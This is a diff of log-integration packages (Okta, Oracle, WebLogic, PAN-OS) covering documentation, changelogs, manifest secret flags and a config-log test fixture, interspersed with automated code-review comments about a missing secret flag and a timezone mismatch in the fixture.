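Review bot: The added `{{#if key_pem}}` block emits `auth.oauth2.okta.jwk_pem` independently of the `jwk_json` and `jwk_file` blocks next to it, so a policy that sets more than one of the three produces a config with several key sources at once even though the manifest text says only one may be used; which key wins is then decided by the input, not the package. Either guard the block so it is emitted only when the other two are empty, or add a template comment at the top of this group stating the input's actual precedence or rejection behaviour, e.g. `{{! jwk_json, jwk_file and key_pem are mutually exclusive; see the manifest descriptions }}`. The enclosing `{{#if}}`/`{{#unless}}` blocks open outside this hunk.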
@@ -56,33 +56,54 @@ policy_templates:
 show_user: true
 description: This is the URL of your Okta System Log API. For example, https://dev-123456.okta.com/api/v1/logs.
 - name: api_key
- type: text
+ type: password
 title: API Key
 multi: false
 required: false
 show_user: true
- description: "This is the API Key of your Okta service application. This is only required for the standard api key based authentication. \nDo not use this field if you are using OAuth2 authentication.\n"
+ description: |
+ This is the API Key of your Okta service application. This is only required for the standard api key based authentication.
+ Do not use this field if you are using OAuth2 authentication.
+ secret: true
 - name: okta_domain_url
 type: text
 title: Okta Domain URL
 multi: false
 required: false
 show_user: true
- description: "This is the URL of your Okta domain. For example, https://dev-123456.okta.com. \nThis is only required for OAuth2 authentication. Do not use this field if you are using API Key based authentication.\n"
+ description: |
+ This is the URL of your Okta domain. For example, https://dev-123456.okta.com.
+ This is only required for OAuth2 authentication. Do not use this field if you are using API Key based authentication.
 - name: client_id
 type: text
 title: Client ID
 multi: false
 required: false
 show_user: true
- description: "This is the Client ID of your Okta service application. This is only required for OAuth2 authentication. \nDo not use this field if you are using API Key based authentication.\n"
+ description: |
+ This is the Client ID of your Okta service application. This is only required for OAuth2 authentication.
+ Do not use this field if you are using API Key based authentication.
 - name: jwk_json
 type: password
 title: JWK JSON
 multi: false
 required: false
 show_user: true
- description: "This is the private JSON Web Key (JWK) of your Okta service application. \nThis is only required for OAuth2 authentication. Do not use this field if you are using API Key based authentication.\n"
+ description: |
+ This is the private JSON Web Key (JWK) of your Okta service application.
+ This is only required for OAuth2 authentication. Do not use this field if you are using API Key based authentication.
+ Only one of JWK JSON, PEM Encoded Key or JWK File may be used.
+ secret: true
+ - name: key_pem
+ type: textarea
+ title: PEM Encoded Key
+ multi: false
+ required: false
+ show_user: true
+ description: |
+ This is the private key of your Okta service application in PEM format.
+ This is only required for OAuth2 authentication. Do not use this field if you are using API Key based authentication.
+ Only one of JWK JSON, PEM Encoded Key or JWK File may be used.
 - name: jwk_file
 type: text
 title: JWK File
@@ -92,6 +113,7 @@ policy_templates:
 description: |
 This is the path to the file containing the private JSON Web Key (JWK) of your Okta service application.
 This is only required for OAuth2 authentication. Do not use this field if you are using API Key based authentication.
+ Only one of JWK JSON, PEM Encoded Key or JWK File may be used.
 - name: okta_scopes
 type: text
 title: Okta Scopes
diff --git a/packages/oracle/_dev/build/docs/README.md b/packages/oracle/_dev/build/docs/README.md
index 7642d345a48..a0d6e9d1944 100644
--- a/packages/oracle/_dev/build/docs/README.md
+++ b/packages/oracle/_dev/build/docs/README.md
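Review bot: `key_pem` is declared `type: textarea` without `secret: true`, while `api_key` and `jwk_json` in the same hunk are marked `secret: true`; a PEM-encoded private key is at least as sensitive as the JWK JSON and would otherwise be kept in the agent policy in the clear. If the package spec (bumped to 3.0.2 in this commit) permits secrets on textarea vars, add `secret: true` after `show_user: true` in the `key_pem` entry; if it does not, leave a comment saying so, since the kibana constraint was already raised to `^8.13.0` for the other secrets. The "Only one of JWK JSON, PEM Encoded Key or JWK File may be used" sentence is repeated on three vars with nothing enforcing it; presumably the input rejects multiple keys, and a `# only one of jwk_json / key_pem / jwk_file is accepted by the httpjson okta auth` note would tell the next maintainer where that check lives.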
@@ -62,13 +62,23 @@ Then, Metricbeat can be launched. ### Oracle DSN Configuration -The supported configuration takes one of the forms -- `oracle://:@` -- `:@` +The following two configuration formats are supported: +``` +oracle://:@ +user="" password="" connectString="" sysdba= +``` -Examples of supported configurations are as below: -- `oracle://sys:Oradoc_db1@0.0.0.0:1521/ORCLCDB.localdomain?sysdba=1` -- `sys:Oradoc_db1@0.0.0.0:1521/ORCLCDB.localdomain?sysdba=1` +Example values are: +``` +oracle://sys:Oradoc_db1@0.0.0.0:1521/ORCLCDB.localdomain?sysdba=1 +user="sys" password="Oradoc_db1" connectString="0.0.0.0:1521/ORCLCDB.localdomain" sysdba=true +``` + +In the first, URL-based format, special characters should be URL encoded. + +In the seoncd, logfmt-encoded DSN format, if the password contains a backslash +character (`\`), it must be escaped with another backslash. For example, if the +password is `my\_password`, it must be written as `my\\_password`. ## Compatibility 
@@ -86,13 +96,23 @@ The `database_audit` dataset collects Oracle Audit logs. Tablespace metrics describes the tablespace usage metrics of all types of tablespaces in the oracle database. +To collect the Tablespace metrics, Oracle integration relies on a specific set of views. Make sure that the user configured within the Oracle DSN configuration has `READ` access permissions to the following views: + +- `SYS.DBA_DATA_FILES` +- `SYS.DBA_TEMP_FILES` +- `DBA_FREE_SPACE` + {{fields "tablespace"}} {{event "tablespace"}} ### Sysmetrics -The system metrics value captured for the most current time interval for the long duration (60-seconds) are mentioned below +The system metrics value captured for the most current time interval for the long duration (60-seconds) are listed in the following table. + +To collect the Sysmetrics metrics, Oracle integration relies on a specific set of views. Make sure that the user configured within the Oracle DSN configuration has `READ` access permissions to the following view: + +- `V$SYSMETRIC` {{fields "sysmetric"}} @@ -102,6 +122,11 @@ The system metrics value captured for the most current time interval for the lon A Program Global Area (PGA) is a memory region that contains data and control information for a server process. It is nonshared memory created by Oracle Database when a server process is started. Access to the PGA is exclusive to the server process. Metrics concerning Program Global Area (PGA) memory are mentioned below. +To collect the Memory metrics, Oracle integration relies on a specific set of views. Make sure that the user configured within the Oracle DSN configuration has `READ` access permissions to the following views: + +- `V$SGASTAT` +- `V$PGASTAT` + {{fields "memory"}} {{event "memory"}} 
@@ -110,6 +135,10 @@ A Program Global Area (PGA) is a memory region that contains data and control in The System Global Area (SGA) is a group of shared memory structures that contain data and control information for one Oracle Database instance. Metrics concerning System Global Area (SGA) memory are mentioned below. +To collect the System Statistics metrics, Oracle integration relies on a specific set of views. Make sure that the user configured within the Oracle DSN configuration has `READ` access permissions to the following view: + +- `V$SYSSTAT` + {{fields "system_statistics"}} {{event "system_statistics"}} @@ -118,6 +147,16 @@ The System Global Area (SGA) is a group of shared memory structures that contain Performance metrics give an overview of where time is spent in the system and enable comparisons of wait times across the system. +To collect the Performance metrics, Oracle integration relies on a specific set of views. Make sure that the user configured within the Oracle DSN configuration has `READ` access permissions to the following views: + +- `V$BUFFER_POOL_STATISTICS` +- `V$SESSTAT` +- `V$SYSSTAT` +- `V$LIBRARYCACHE` +- `DBA_JOBS` +- `GV$SESSION` +- `V$SYSTEM_WAIT_CLASS` + {{fields "performance"}} {{event "performance"}} diff --git a/packages/oracle/changelog.yml b/packages/oracle/changelog.yml index 5ac6c63966f..2fefb5dcdd2 100644 --- a/packages/oracle/changelog.yml +++ b/packages/oracle/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: 1.24.3 + changes: + - description: README updates regarding mandatory user permission. + type: bugfix + link: https://github.com/elastic/integrations/pull/9104 +- version: 1.24.2 + changes: + - description: README updates regarding DSN formats. + type: bugfix + link: https://github.com/elastic/integrations/pull/8841 - version: 1.24.1 changes: - description: Make Oracle DSN configuration details more discoverable. 
diff --git a/packages/oracle/docs/README.md b/packages/oracle/docs/README.md index d949a808260..12e9b488708 100644 --- a/packages/oracle/docs/README.md +++ b/packages/oracle/docs/README.md @@ -62,13 +62,23 @@ Then, Metricbeat can be launched. ### Oracle DSN Configuration -The supported configuration takes one of the forms -- `oracle://:@` -- `:@` +The following two configuration formats are supported: +``` +oracle://:@ +user="" password="" connectString="" sysdba= +``` + +Example values are: +``` +oracle://sys:Oradoc_db1@0.0.0.0:1521/ORCLCDB.localdomain?sysdba=1 +user="sys" password="Oradoc_db1" connectString="0.0.0.0:1521/ORCLCDB.localdomain" sysdba=true +``` + +In the first, URL-based format, special characters should be URL encoded. -Examples of supported configurations are as below: -- `oracle://sys:Oradoc_db1@0.0.0.0:1521/ORCLCDB.localdomain?sysdba=1` -- `sys:Oradoc_db1@0.0.0.0:1521/ORCLCDB.localdomain?sysdba=1` +In the seoncd, logfmt-encoded DSN format, if the password contains a backslash +character (`\`), it must be escaped with another backslash. For example, if the +password is `my\_password`, it must be written as `my\\_password`. ## Compatibility @@ -311,6 +321,12 @@ An example event for `database_audit` looks as following: Tablespace metrics describes the tablespace usage metrics of all types of tablespaces in the oracle database. +To collect the Tablespace metrics, Oracle integration relies on a specific set of views. Make sure that the user configured within the Oracle DSN configuration has `READ` access permissions to the following views: + +- `SYS.DBA_DATA_FILES` +- `SYS.DBA_TEMP_FILES` +- `DBA_FREE_SPACE` + **Exported fields** | Field | Description | Type | Unit | Metric Type | 
@@ -466,7 +482,11 @@ An example event for `tablespace` looks as following: ### Sysmetrics -The system metrics value captured for the most current time interval for the long duration (60-seconds) are mentioned below +The system metrics value captured for the most current time interval for the long duration (60-seconds) are listed in the following table. + +To collect the Sysmetrics metrics, Oracle integration relies on a specific set of views. Make sure that the user configured within the Oracle DSN configuration has `READ` access permissions to the following view: + +- `V$SYSMETRIC` **Exported fields** @@ -909,6 +929,11 @@ An example event for `sysmetric` looks as following: A Program Global Area (PGA) is a memory region that contains data and control information for a server process. It is nonshared memory created by Oracle Database when a server process is started. Access to the PGA is exclusive to the server process. Metrics concerning Program Global Area (PGA) memory are mentioned below. +To collect the Memory metrics, Oracle integration relies on a specific set of views. Make sure that the user configured within the Oracle DSN configuration has `READ` access permissions to the following views: + +- `V$SGASTAT` +- `V$PGASTAT` + **Exported fields** | Field | Description | Type | Unit | Metric Type | @@ -1054,6 +1079,10 @@ An example event for `memory` looks as following: The System Global Area (SGA) is a group of shared memory structures that contain data and control information for one Oracle Database instance. Metrics concerning System Global Area (SGA) memory are mentioned below. +To collect the System Statistics metrics, Oracle integration relies on a specific set of views. Make sure that the user configured within the Oracle DSN configuration has `READ` access permissions to the following view: + +- `V$SYSSTAT` + **Exported fields** | Field | Description | Type | Unit | Metric Type | 
@@ -1331,6 +1360,16 @@ An example event for `system_statistics` looks as following: Performance metrics give an overview of where time is spent in the system and enable comparisons of wait times across the system. +To collect the Performance metrics, Oracle integration relies on a specific set of views. Make sure that the user configured within the Oracle DSN configuration has `READ` access permissions to the following views: + +- `V$BUFFER_POOL_STATISTICS` +- `V$SESSTAT` +- `V$SYSSTAT` +- `V$LIBRARYCACHE` +- `DBA_JOBS` +- `GV$SESSION` +- `V$SYSTEM_WAIT_CLASS` + **Exported fields** | Field | Description | Type | Unit | Metric Type | diff --git a/packages/oracle/manifest.yml b/packages/oracle/manifest.yml index b399631bec8..cd32ed2a9f3 100644 --- a/packages/oracle/manifest.yml +++ b/packages/oracle/manifest.yml @@ -1,7 +1,7 @@ format_version: "3.0.0" name: oracle title: "Oracle" -version: "1.24.1" +version: "1.24.3" description: Collect Oracle Audit Log, Performance metrics, Tablespace metrics, Sysmetrics metrics, System statistics metrics, memory metrics from Oracle database. type: integration categories: diff --git a/packages/oracle_weblogic/_dev/build/docs/README.md b/packages/oracle_weblogic/_dev/build/docs/README.md index 911da813801..f000dae45f8 100644 --- a/packages/oracle_weblogic/_dev/build/docs/README.md +++ b/packages/oracle_weblogic/_dev/build/docs/README.md 
@@ -34,99 +34,8 @@ In order to ingest data from Oracle WebLogic: ``` ### Troubleshooting -Conflicts in any field in any data stream can be solved by reindexing the data. -If host.ip is shown conflicted under ``logs-*`` data view, then this issue can be solved by reindexing the ``Admin Server`` data stream's indices. -If host.ip is shown conflicted under ``metrics-*`` data view, then this issue can be solved by reindexing the ``Deployed Application`` and ``Threadpool`` data stream's indices. -To reindex the data, the following steps must be performed. - -1. Stop the data stream by going to `Integrations -> Oracle WebLogic -> Integration policies` open the configuration of Oracle WebLogic and disable the `Collect Oracle WebLogic metrics` toggle to reindex metrics data stream and disable the `Collect Oracle WebLogic logs` toggle to reindex logs data stream and save the integration. - -2. Perform the following steps in the Dev tools - -``` -POST _reindex -{ - "source": { - "index": "" - }, - "dest": { - "index": "temp_index" - } -} -``` -Example: -``` -POST _reindex -{ - "source": { - "index": "logs-oracle_weblogic.admin_server-default" - }, - "dest": { - "index": "temp_index" - } -} -``` - -``` -DELETE /_data_stream/ -``` -Example: -``` -DELETE /_data_stream/logs-oracle_weblogic.admin_server-default -``` - -``` -DELETE _index_template/ -``` -Example: -``` -DELETE _index_template/logs-oracle_weblogic.admin_server -``` -3. Go to `Integrations -> Oracle WebLogic -> Settings` and click on `Reinstall Oracle WebLogic`. - -4. Perform the following steps in the Dev tools - -``` -POST _reindex -{ - "conflicts": "proceed", - "source": { - "index": "temp_index" - }, - "dest": { - "index": "", - "op_type": "create" - - } -} -``` -Example: -``` -POST _reindex -{ - "conflicts": "proceed", - "source": { - "index": "temp_index" - }, - "dest": { - "index": "logs-oracle_weblogic.admin_server-default", - "op_type": "create" - - } -} -``` - -5. Verify data is reindexed completely. - -6. 
Start the data stream by going to the `Integrations -> Oracle WebLogic -> Integration policies` and open configuration of integration and enable the `Collect Oracle WebLogic metrics` toggle and enable the `Collect Oracle WebLogic logs` toggle save the integration. - -7. Perform the following step in the Dev tools - -``` -DELETE temp_index -``` - -More details about reindexing can be found [here](https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-reindex.html). +- If `host.ip` appears conflicted under the ``logs-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Admin Server`` data stream. +- If `host.ip` appears conflicted under the ``metrics-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/tsds-reindex.html) the ``Deployed Application`` and ``Threadpool`` data streams. ## Logs diff --git a/packages/oracle_weblogic/changelog.yml b/packages/oracle_weblogic/changelog.yml index 02bf8180650..8b22c4e83e3 100644 --- a/packages/oracle_weblogic/changelog.yml +++ b/packages/oracle_weblogic/changelog.yml 
@@ -1,4 +1,24 @@
 # newer versions go on top
+- version: "1.5.1"
+ changes:
+ - description: Update README with reindexing steps.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9529
+- version: "1.5.0"
+ changes:
+ - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9321
+- version: "1.4.1"
+ changes:
+ - description: Disable secrets for older stack versions due to errors.
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/9279
+- version: "1.4.0"
+ changes:
+ - description: Enable 'secret' for the sensitive fields, supported from 8.12.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9009
 - version: "1.3.1"
 changes:
 - description: Fixed Admin Server, Managed Server and Domain Logs visualization.
diff --git a/packages/oracle_weblogic/docs/README.md b/packages/oracle_weblogic/docs/README.md
index 5ed87f06644..014612aa308 100644
--- a/packages/oracle_weblogic/docs/README.md
+++ b/packages/oracle_weblogic/docs/README.md
@@ -34,99 +34,8 @@ In order to ingest data from Oracle WebLogic: ``` ### Troubleshooting -Conflicts in any field in any data stream can be solved by reindexing the data. -If host.ip is shown conflicted under ``logs-*`` data view, then this issue can be solved by reindexing the ``Admin Server`` data stream's indices. -If host.ip is shown conflicted under ``metrics-*`` data view, then this issue can be solved by reindexing the ``Deployed Application`` and ``Threadpool`` data stream's indices. -To reindex the data, the following steps must be performed. - -1. Stop the data stream by going to `Integrations -> Oracle WebLogic -> Integration policies` open the configuration of Oracle WebLogic and disable the `Collect Oracle WebLogic metrics` toggle to reindex metrics data stream and disable the `Collect Oracle WebLogic logs` toggle to reindex logs data stream and save the integration. - -2. Perform the following steps in the Dev tools - -``` -POST _reindex -{ - "source": { - "index": "" - }, - "dest": { - "index": "temp_index" - } -} -``` -Example: -``` -POST _reindex -{ - "source": { - "index": "logs-oracle_weblogic.admin_server-default" - }, - "dest": { - "index": "temp_index" - } -} -``` - -``` -DELETE /_data_stream/ -``` -Example: -``` -DELETE /_data_stream/logs-oracle_weblogic.admin_server-default -``` - -``` -DELETE _index_template/ -``` -Example: -``` -DELETE _index_template/logs-oracle_weblogic.admin_server -``` -3. Go to `Integrations -> Oracle WebLogic -> Settings` and click on `Reinstall Oracle WebLogic`. - -4. Perform the following steps in the Dev tools - -``` -POST _reindex -{ - "conflicts": "proceed", - "source": { - "index": "temp_index" - }, - "dest": { - "index": "", - "op_type": "create" - - } -} -``` -Example: -``` -POST _reindex -{ - "conflicts": "proceed", - "source": { - "index": "temp_index" - }, - "dest": { - "index": "logs-oracle_weblogic.admin_server-default", - "op_type": "create" - - } -} -``` - -5. Verify data is reindexed completely. - -6. 
Start the data stream by going to the `Integrations -> Oracle WebLogic -> Integration policies` and open configuration of integration and enable the `Collect Oracle WebLogic metrics` toggle and enable the `Collect Oracle WebLogic logs` toggle save the integration. - -7. Perform the following step in the Dev tools - -``` -DELETE temp_index -``` - -More details about reindexing can be found [here](https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-reindex.html). +- If `host.ip` appears conflicted under the ``logs-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Admin Server`` data stream. +- If `host.ip` appears conflicted under the ``metrics-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/tsds-reindex.html) the ``Deployed Application`` and ``Threadpool`` data streams. ## Logs diff --git a/packages/oracle_weblogic/manifest.yml b/packages/oracle_weblogic/manifest.yml index a3a27b6b6b0..f41ed675d2b 100644 --- a/packages/oracle_weblogic/manifest.yml +++ b/packages/oracle_weblogic/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: oracle_weblogic title: Oracle WebLogic -version: "1.3.1" +version: "1.5.1" description: Collect logs and metrics from Oracle WebLogic with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - observability conditions: kibana: - version: "^8.8.0" + version: "^8.12.0" elastic: subscription: basic screenshots: @@ -54,6 +54,7 @@ policy_templates: - name: password type: password title: Password + secret: true multi: false required: false show_user: false diff --git a/packages/osquery/changelog.yml b/packages/osquery/changelog.yml index e84b855b072..83e2b5f41b9 100644 --- a/packages/osquery/changelog.yml +++ b/packages/osquery/changelog.yml 
@@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.19.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 - version: "1.18.2" changes: - description: Changed owners diff --git a/packages/osquery/manifest.yml b/packages/osquery/manifest.yml index bec77d06a4c..3a836d763d8 100644 --- a/packages/osquery/manifest.yml +++ b/packages/osquery/manifest.yml @@ -1,6 +1,6 @@ name: osquery title: Osquery Logs -version: "1.18.2" +version: "1.19.0" description: Collect logs from Osquery with Elastic Agent. type: integration icons: @@ -8,7 +8,7 @@ icons: title: logo osquery size: 32x32 type: image/svg+xml -format_version: "3.0.0" +format_version: "3.0.3" categories: - security conditions: diff --git a/packages/panw/_dev/build/docs/README.md b/packages/panw/_dev/build/docs/README.md index c84d41ff7a4..dc063bc47f4 100644 --- a/packages/panw/_dev/build/docs/README.md +++ b/packages/panw/_dev/build/docs/README.md @@ -12,6 +12,8 @@ This integration is for Palo Alto Networks PAN-OS firewall monitoring logs recei - This integration supports logs of Tunnel Inspection for PAN-OS version 9.1 or above. +- This integration supports logs of configuration changes with and without details about the changed configuration(`before-change-detail` and `after-change-detail`). Please read [Note](#note) for more details. + - This module has been tested with logs generated by devices running PAN-OS versions 7.1 to 11.0. ## Configurations 
@@ -23,6 +25,8 @@ To configure syslog monitoring, please follow the steps mentioned in the [_Confi - It can be found under Advanced Options and can be configured as per requirements. The default value of `max_message_size` is set to 50KiB. - If the TCP input is used, it is recommended that PAN-OS is configured to send syslog messages using the IETF (RFC 5424) format. In addition, RFC 6587 framing (Octet Counting) will be enabled by default on the TCP input. +- If you want to see the configuration before and after the change(fields `before-change-detail` and `after-change-detail`) in the [config-log](https://docs.paloaltonetworks.com/pan-os/11-1/pan-os-admin/monitoring/use-syslog-for-monitoring/syslog-field-descriptions/config-log-fields), please use the following [custom log format in the syslog server profile](https://docs.paloaltonetworks.com/pan-os/11-1/pan-os-admin/monitoring/use-syslog-for-monitoring/syslog-field-descriptions/custom-logevent-format): + ``1,$receive_time,$serial,$type,$subtype,2561,$time_generated,$host,$vsys,$cmd,$admin,$client,$result,$path,$before-change-detail,$after-change-detail,$seqno,$actionflags,$dg_hier_level_1,$dg_hier_level_2,$dg_hier_level_3,$dg_hier_level_4,$vsys_name,$device_name,$dg_id,$comment,0,$high_res_timestamp`` ## Logs diff --git a/packages/panw/changelog.yml b/packages/panw/changelog.yml index c18a716a817..7e9c26ed84a 100644 --- a/packages/panw/changelog.yml +++ b/packages/panw/changelog.yml 
@@ -1,4 +1,34 @@
 # newer versions go on top
+- version: "3.24.2"
+ changes:
+ - description: Prevent denied duplication in event.type
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/9538
+- version: "3.24.1"
+ changes:
+ - description: fixed parsing of hostnames and usernames to accept additional characters
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/9479
+- version: "3.24.0"
+ changes:
+ - description: fixed parsing of usernames and domains(src+dst) to allow shortened domains("nt-auth...t"), domains that only contain a "." and usernames that contain ":". Also fixed the parsing of custom config-log-format.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9247
+- version: "3.23.1"
+ changes:
+ - description: Ensure empty NAT IP is not appended to related items.
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/9333
+- version: "3.23.0"
+ changes:
+ - description: Update package spec to 3.0.3.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9235
+- version: "3.22.0"
+ changes:
+ - description: Add session.start_time for ML jobs
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9154
 - version: "3.21.2"
 changes:
 - description: Changed owners
diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-config-sample.log b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-config-sample.log
index d26db7926c0..6da40e01690 100644
--- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-config-sample.log
+++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-config-sample.log
@@ -3,3 +3,4 @@
 1,2023/10/04 08:52:10,007058000248010,CONFIG,0,2816,2023/10/04 08:52:10,81.2.69.193,,set,admin,Web,Succeeded, vsys vsys1 rulebase security rules reset-adult,,reset-adult 73a06abf-75ca-436f-9319-1a15b27fa692 { to [ public ]; from [ private ]; source [ any ]; destination [ any ]; source-user [ any ]; category [ adult ]; application [ any ]; service [ application-default ]; source-hip [ any ]; destination-hip [ any ]; action reset-client; icmp-unreachable yes; log-start yes; rule-type interzone; } ,7286123782408765488,0x0,0,0,0,0,,PA-VM,0,
 1,2023/10/04 08:50:28,007058000248010,CONFIG,0,2816,2023/10/04 08:50:28,81.2.69.193,,move,admin,Web,Succeeded, vsys vsys1 rulebase security rules block-1.1.1.1,,,7286123782408765487,0x0,0,0,0,0,,PA-VM,0,
 1,2023/10/04 08:27:38,007058000248010,CONFIG,0,2816,2023/10/04 08:27:38,81.2.69.193,,override,admin,Web,Failed, deviceconfig system device-telemetry,,,7286123782408765440,0x0,0,0,0,0,,PA-VM,0,
+1,2024/02/29 16:59:40,01234567890,CONFIG,0,2561,2024/02/29 16:59:40,81.2.69.193,,edit,admin,Web,Succeeded, vsys vsys1 address test123,"test123 { description ""this, is a test. with, three comma, x4""; } ","test123 { description ""this, is a test. with, three comma, x5""; } ",7304387121517691189,0x0,0,0,0,0,,PA-VM,0,,0,2024-02-29T16:59:40.421+01:00
diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-config-sample.log-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-config-sample.log-expected.json
index bfb644f6574..a1561010975 100644
--- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-config-sample.log-expected.json
+++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-config-sample.log-expected.json
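Review bot: The added sample line carries a `$high_res_timestamp` with a `+01:00` offset while the offset-less `time_generated` value of the same event is interpreted in the test's configured zone (the expected output shows `event.timezone` `-04:00`), so the generated expectation has `@timestamp` `2024-02-29T16:59:40.000-04:00` but `high_resolution_timestamp` `2024-02-29T11:59:40.421-04:00`, two timestamps five hours apart for one event. Either align the sample's offset with the test timezone (`...,PA-VM,0,,0,2024-02-29T16:59:40.421-04:00`) or record in the PR description that the disagreement is deliberate, so the fixture documents behaviour instead of looking like a parsing bug. Separately, the expected JSON for this quoted record keeps the trailing space in `after_change_detail` (`... x5\"; } "`) while the same commit trims it for the unquoted record on the first line (`rule-type interzone; }`), which suggests the trim runs before the quoted-field parse and is worth a look in the pipeline.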
@@ -40,7 +40,7 @@ "device_group_hierarchy3": "0", "device_group_hierarchy4": "0", "device_group_id": "0", - "path": " config shared log-settings iptag match-list ip-tag", + "path": "config shared log-settings iptag match-list ip-tag", "result": "Succeeded", "sequence_number": "1234567890", "sub_type": "0", @@ -53,6 +53,9 @@ ], "ip": [ "81.2.69.193" + ], + "user": [ + "admin" ] }, "tags": [ @@ -99,7 +102,7 @@ "device_group_hierarchy3": "0", "device_group_hierarchy4": "0", "device_group_id": "0", - "path": " config shared log-settings globalprotect match-list globalProtect", + "path": "config shared log-settings globalprotect match-list globalProtect", "result": "Succeeded", "sequence_number": "1234567890", "sub_type": "0", @@ -112,6 +115,9 @@ ], "ip": [ "81.2.69.193" + ], + "user": [ + "admin" ] }, "tags": [ @@ -151,7 +157,7 @@ "panos": { "action_flags": "0x0", "admin": "admin", - "after_change_detail": "reset-adult 73a06abf-75ca-436f-9319-1a15b27fa692 { to [ public ]; from [ private ]; source [ any ]; destination [ any ]; source-user [ any ]; category [ adult ]; application [ any ]; service [ application-default ]; source-hip [ any ]; destination-hip [ any ]; action reset-client; icmp-unreachable yes; log-start yes; rule-type interzone; } ", + "after_change_detail": "reset-adult 73a06abf-75ca-436f-9319-1a15b27fa692 { to [ public ]; from [ private ]; source [ any ]; destination [ any ]; source-user [ any ]; category [ adult ]; application [ any ]; service [ application-default ]; source-hip [ any ]; destination-hip [ any ]; action reset-client; icmp-unreachable yes; log-start yes; rule-type interzone; }", "client_type": "Web", "cmd": "set", "device_group_hierarchy1": "0", 
@@ -159,7 +165,7 @@ "device_group_hierarchy3": "0", "device_group_hierarchy4": "0", "device_group_id": "0", - "path": " vsys vsys1 rulebase security rules reset-adult", + "path": "vsys vsys1 rulebase security rules reset-adult", "result": "Succeeded", "sequence_number": "7286123782408765488", "sub_type": "0", @@ -172,6 +178,9 @@ ], "ip": [ "81.2.69.193" + ], + "user": [ + "admin" ] }, "tags": [ @@ -218,7 +227,7 @@ "device_group_hierarchy3": "0", "device_group_hierarchy4": "0", "device_group_id": "0", - "path": " vsys vsys1 rulebase security rules block-1.1.1.1", + "path": "vsys vsys1 rulebase security rules block-1.1.1.1", "result": "Succeeded", "sequence_number": "7286123782408765487", "sub_type": "0", @@ -231,6 +240,9 @@ ], "ip": [ "81.2.69.193" + ], + "user": [ + "admin" ] }, "tags": [ @@ -276,7 +288,7 @@ "device_group_hierarchy3": "0", "device_group_hierarchy4": "0", "device_group_id": "0", - "path": " deviceconfig system device-telemetry", + "path": "deviceconfig system device-telemetry", "result": "Failed", "sequence_number": "7286123782408765440", "sub_type": "0", 
@@ -289,6 +301,74 @@ ], "ip": [ "81.2.69.193" + ], + "user": [ + "admin" + ] + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-02-29T16:59:40.000-04:00", + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "cmd-edit", + "category": [ + "configuration" + ], + "created": "2024-02-29T16:59:40.000-04:00", + "kind": "event", + "original": "1,2024/02/29 16:59:40,01234567890,CONFIG,0,2561,2024/02/29 16:59:40,81.2.69.193,,edit,admin,Web,Succeeded, vsys vsys1 address test123,\"test123 { description \"\"this, is a test. with, three comma, x4\"\"; } \",\"test123 { description \"\"this, is a test. with, three comma, x5\"\"; } \",7304387121517691189,0x0,0,0,0,0,,PA-VM,0,,0,2024-02-29T16:59:40.421+01:00", + "outcome": "success", + "timezone": "-04:00" + }, + "host": { + "ip": [ + "81.2.69.193" + ] + }, + "message": "81.2.69.193,,edit,admin,Web,Succeeded, vsys vsys1 address test123,\"test123 { description \"\"this, is a test. with, three comma, x4\"\"; } \",\"test123 { description \"\"this, is a test. with, three comma, x5\"\"; } \",7304387121517691189,0x0,0,0,0,0,,PA-VM,0,,0,2024-02-29T16:59:40.421+01:00", + "observer": { + "hostname": "PA-VM", + "product": "PAN-OS", + "serial_number": "01234567890", + "type": "firewall", + "vendor": "Palo Alto Networks" + }, + "panw": { + "panos": { + "action_flags": "0x0", + "admin": "admin", + "after_change_detail": "test123 { description \"this, is a test. with, three comma, x5\"; } ", + "before_change_detail": "test123 { description \"this, is a test. 
